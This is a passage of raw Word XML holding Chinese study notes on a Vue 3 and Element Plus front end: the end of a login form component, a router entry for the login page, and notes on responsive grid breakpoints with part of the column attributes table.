    <w:p w14:paraId="4A2F2646" w14:textId="77777777" w:rsidR="00E358DE" w:rsidRPr="00E358DE" w:rsidRDefault="00E358DE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E358DE">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;/el-col&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDC3AED" w14:textId="77777777" w:rsidR="00E358DE" w:rsidRPr="00E358DE" w:rsidRDefault="00E358DE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E358DE">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;/el-row&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CD545D" w14:textId="77777777" w:rsidR="00E358DE" w:rsidRPr="00E358DE" w:rsidRDefault="00E358DE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E358DE">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&lt;/template&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642A4B73" w14:textId="77777777" w:rsidR="00E358DE" w:rsidRPr="00E358DE" w:rsidRDefault="00E358DE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E358DE">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459D688C" w14:textId="77777777" w:rsidR="00E358DE" w:rsidRPr="00E358DE" w:rsidRDefault="00E358DE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E358DE">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&lt;style&gt;&lt;/style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C0A0AB" w14:textId="77777777" w:rsidR="00E358DE" w:rsidRPr="00E358DE" w:rsidRDefault="00E358DE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72E0A9D8" w14:textId="77777777" w:rsidR="00E358DE" w:rsidRPr="00E358DE" w:rsidRDefault="00E358DE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E358DE">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&lt;script setup&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE0A8A0" w14:textId="77777777" w:rsidR="00E358DE" w:rsidRPr="00E358DE" w:rsidRDefault="00E358DE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E358DE">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>import { reactive } from 'vue'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B1BDFE" w14:textId="77777777" w:rsidR="00E358DE" w:rsidRPr="00E358DE" w:rsidRDefault="00E358DE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35D29822" w14:textId="77777777" w:rsidR="00E358DE" w:rsidRPr="00E358DE" w:rsidRDefault="00E358DE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E358DE">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>// do not use same name with ref</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B23288A" w14:textId="77777777" w:rsidR="00E358DE" w:rsidRPr="00E358DE" w:rsidRDefault="00E358DE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E358DE">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>const form = reactive({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED72E51" w14:textId="77777777" w:rsidR="00E358DE" w:rsidRPr="00E358DE" w:rsidRDefault="00E358DE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E358DE">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">  username:"",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6018C0C0" w14:textId="77777777" w:rsidR="00E358DE" w:rsidRPr="00E358DE" w:rsidRDefault="00E358DE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E358DE">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">  password:""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A77219" w14:textId="77777777" w:rsidR="00E358DE" w:rsidRPr="00E358DE" w:rsidRDefault="00E358DE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E358DE">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D0F596" w14:textId="77777777" w:rsidR="00E358DE" w:rsidRPr="00E358DE" w:rsidRDefault="00E358DE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="456A406D" w14:textId="77777777" w:rsidR="00E358DE" w:rsidRPr="00E358DE" w:rsidRDefault="00E358DE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E358DE">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>const onSubmit = () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183673A3" w14:textId="77777777" w:rsidR="00E358DE" w:rsidRPr="00E358DE" w:rsidRDefault="00E358DE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E358DE">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">  console.log('submit!')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFEE61D" w14:textId="77777777" w:rsidR="00E358DE" w:rsidRPr="00E358DE" w:rsidRDefault="00E358DE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E358DE">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB58D06" w14:textId="7CCEE5AF" w:rsidR="00657FD2" w:rsidRDefault="00E358DE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00E358DE">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69EC912F" w14:textId="77777777" w:rsidR="00657FD2" w:rsidRDefault="00657FD2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08264961" w14:textId="1CAD2762" w:rsidR="007F2C96" w:rsidRDefault="00DA6FB9" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:t>outer/index.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7CC6DC" w14:textId="77777777" w:rsidR="00AA4968" w:rsidRDefault="00AA4968" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="547F5573" w14:textId="20E5E933" w:rsidR="00DA6FB9" w:rsidRDefault="00AA4968" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>import Login from '~/pages/login.vue'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B43F87" w14:textId="77777777" w:rsidR="00DA6FB9" w:rsidRDefault="00DA6FB9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E1ABEE5" w14:textId="22A0C481" w:rsidR="00DA6FB9" w:rsidRDefault="00AA4968" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>route</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>添加</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FD6694" w14:textId="77777777" w:rsidR="00AA4968" w:rsidRPr="00AA4968" w:rsidRDefault="00AA4968" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4968">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4968">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>登录页面</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E553512" w14:textId="77777777" w:rsidR="00AA4968" w:rsidRPr="00AA4968" w:rsidRDefault="00AA4968" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA4968">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    { </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E1F6BE" w14:textId="77777777" w:rsidR="00AA4968" w:rsidRPr="00AA4968" w:rsidRDefault="00AA4968" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA4968">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        path: '/login', </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C38C98" w14:textId="77777777" w:rsidR="00AA4968" w:rsidRPr="00AA4968" w:rsidRDefault="00AA4968" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA4968">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        component: Login </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C5DA24" w14:textId="30F59E8D" w:rsidR="00AA4968" w:rsidRDefault="00AA4968" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00AA4968">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331A0619" w14:textId="77777777" w:rsidR="00DA6FB9" w:rsidRDefault="00DA6FB9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A6D4C62" w14:textId="269E9099" w:rsidR="001C5FB0" w:rsidRDefault="001C5FB0" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="688" w:name="_Toc159780118"/>
      <w:r w:rsidRPr="001C5FB0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>登录页响应式处理</w:t>
      </w:r>
      <w:bookmarkEnd w:id="688"/>
    </w:p>
    <w:p w14:paraId="0868BBAF" w14:textId="70EC7F7B" w:rsidR="00DA6FB9" w:rsidRDefault="00AF7529" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>按下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">12 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>选取元素</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>右侧</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>切换为移动端，可以看到当前网页其实不兼容移动端</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F4F0CE" w14:textId="77777777" w:rsidR="00DA6FB9" w:rsidRDefault="00DA6FB9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33C6EC93" w14:textId="6E3EFFC7" w:rsidR="00DA6FB9" w:rsidRDefault="00631524" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们要处理，不同设备上，由于安卓、平板、电脑横竖比不一样，我们调整布局</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265CE8DA" w14:textId="77777777" w:rsidR="00631524" w:rsidRDefault="00631524" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="716E7FCB" w14:textId="3D252DB0" w:rsidR="00DA6FB9" w:rsidRDefault="003D368C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的响应式布局</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37297805" w14:textId="0EE20547" w:rsidR="00DA6FB9" w:rsidRDefault="003D368C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003D368C">
        <w:t>https://element-plus.org/zh-CN/component/layout.html#%E5%93%8D%E5%BA%94%E5%BC%8F%E5%B8%83%E5%B1%80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6840A4" w14:textId="63DE9089" w:rsidR="00CE45E3" w:rsidRDefault="00CE45E3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>按照</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>boot</w:t>
      </w:r>
      <w:r>
        <w:t>strap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的响应式设计，预设了五个相应尺寸</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> xs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sm</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>md</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>lg xl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FE67BC" w14:textId="77777777" w:rsidR="00CE45E3" w:rsidRDefault="00CE45E3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A247DFE" w14:textId="61EBEEEF" w:rsidR="00DA6FB9" w:rsidRPr="00922EEB" w:rsidRDefault="00CE45E3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00922EEB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>个人理解，</w:t>
      </w:r>
      <w:r w:rsidRPr="00922EEB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ET</w:t>
      </w:r>
      <w:r w:rsidRPr="00922EEB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>自己会根据页面像素占比，调整页面布局。我们写的</w:t>
      </w:r>
      <w:r w:rsidRPr="00922EEB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00922EEB">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>span=""</w:t>
      </w:r>
      <w:r w:rsidRPr="00922EEB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00922EEB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00922EEB">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00922EEB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>开，是固定写死的，但是如果不写</w:t>
      </w:r>
      <w:r w:rsidRPr="00922EEB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>span</w:t>
      </w:r>
      <w:r w:rsidRPr="00922EEB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>，写</w:t>
      </w:r>
      <w:r w:rsidRPr="00922EEB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00922EEB">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">lg  md </w:t>
      </w:r>
      <w:r w:rsidRPr="00922EEB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>会根据不同的像素页面占比，自行调整。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5914FF24" w14:textId="77777777" w:rsidR="00CE45E3" w:rsidRDefault="00CE45E3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1832541D" w14:textId="77777777" w:rsidR="00CE45E3" w:rsidRPr="00CE45E3" w:rsidRDefault="00CE45E3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>Col Attributes#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD19C4C" w14:textId="77777777" w:rsidR="00CE45E3" w:rsidRPr="00CE45E3" w:rsidRDefault="00CE45E3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>属性名</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>说明</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>类型</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>默认值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D65FF8D" w14:textId="77777777" w:rsidR="00CE45E3" w:rsidRPr="00CE45E3" w:rsidRDefault="00CE45E3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>span</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>栅格占据的列数</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D09AC4C" w14:textId="77777777" w:rsidR="00CE45E3" w:rsidRPr="00CE45E3" w:rsidRDefault="00CE45E3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5723C4E9" w14:textId="77777777" w:rsidR="00CE45E3" w:rsidRPr="00CE45E3" w:rsidRDefault="00CE45E3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12460EAA" w14:textId="77777777" w:rsidR="00CE45E3" w:rsidRPr="00CE45E3" w:rsidRDefault="00CE45E3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>offset</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>栅格左侧的间隔格数</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="24AD5871" w14:textId="77777777" w:rsidR="00CE45E3" w:rsidRPr="00CE45E3" w:rsidRDefault="00CE45E3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2926A1DF" w14:textId="77777777" w:rsidR="00CE45E3" w:rsidRPr="00CE45E3" w:rsidRDefault="00CE45E3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE45E3">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
    </w:p>
